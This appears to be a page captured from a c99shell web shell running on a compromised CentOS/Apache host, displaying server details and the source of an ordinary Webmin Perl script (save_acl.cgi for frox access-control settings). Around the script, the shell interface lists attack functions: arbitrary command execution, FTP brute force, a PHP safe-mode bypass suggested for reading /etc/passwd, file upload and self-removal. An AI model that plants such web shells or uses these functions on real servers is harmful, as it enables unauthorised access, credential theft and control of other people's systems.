!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/frox/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_acl.cgi (1.89 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Save access control options

require './frox-lib.pl';
&ReadParse();
&error_setup($text{'acl_err'});
$conf = &get_config();

&save_opt_textbox($conf, "Timeout", \&check_timeout);
&save_opt_textbox($conf, "MaxForks", \&check_forks);
&save_opt_textbox($conf, "MaxForksPerHost", \&check_forks);
&save_opt_textbox($conf, "MaxTransferRate", \&check_rate);
&save_yesno($conf, "DoNTP");
&save_opt_textbox($conf, "NTPAddress", \&check_ntp);

for($i=0; defined($in{"action_$i"}); $i++) {
    next if (!$in{"action_$i"});
    local @val;
    push(@val, $in{"action_$i"});
    if ($in{"src_${i}_def"}) {
        push(@val, "*");
        }
    else {
        &valid_srcdest($in{"src_$i"}) ||
            &error(&text('acl_esrc', $i+1));
        push(@val, $in{"src_$i"});
        }
    push(@val, "-");
    if ($in{"dest_${i}_def"}) {
        push(@val, "*");
        }
    else {
        &valid_srcdest($in{"dest_$i"}) ||
            &error(&text('acl_edest', $i+1));
        push(@val, $in{"dest_$i"});
        }
    if (!$in{"ports_${i}_def"}) {
        foreach $p (split(/,/, $in{"ports_$i"})) {
            $p =~ /^\d+$/ || $p =~ /^\d+\-\d+$/ ||
                &error(&text('acl_eports', $i+1));
            }
        push(@val, $in{"ports_$i"});
        }
    push(@acl, join(" ", @val));
    }
@acl || &error($text{'acl_enone'});
&save_directive($conf, "ACL", \@acl);

&lock_file($config{'frox_conf'});
&flush_file_lines();
&unlock_file($config{'frox_conf'});
&webmin_log("acl");
&redirect("");

sub check_timeout
{
return $_[0] =~ /^\d+$/ ? undef : $text{'acl_etimeout'};
}

sub check_forks
{
return $_[0] =~ /^\d+$/ ? undef : $text{'acl_eforks'};
}

sub check_rate
{
return $_[0] =~ /^\d+$/ ? undef : $text{'acl_erate'};
}

sub check_ntp
{
return $_[0] =~ /^(\S+):(\d+)$/ && &to_ipaddress("$1") ? undef
                             : $text{'acl_entp'};
}


sub valid_srcdest
{
return &to_ipaddress($_[0]) ||
       ($_[0] =~ /^([0-9\.]+)\/(\d+)$/ &&
        &check_ipaddress($1) && $2 > 0 && $2 <= 32) ||
       ($_[0] =~ /^([0-9\.]+)\/([0-9\.]+)$/ &&
        &check_ipaddress($1) && &check_ipaddress($2));
}


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0094 ]--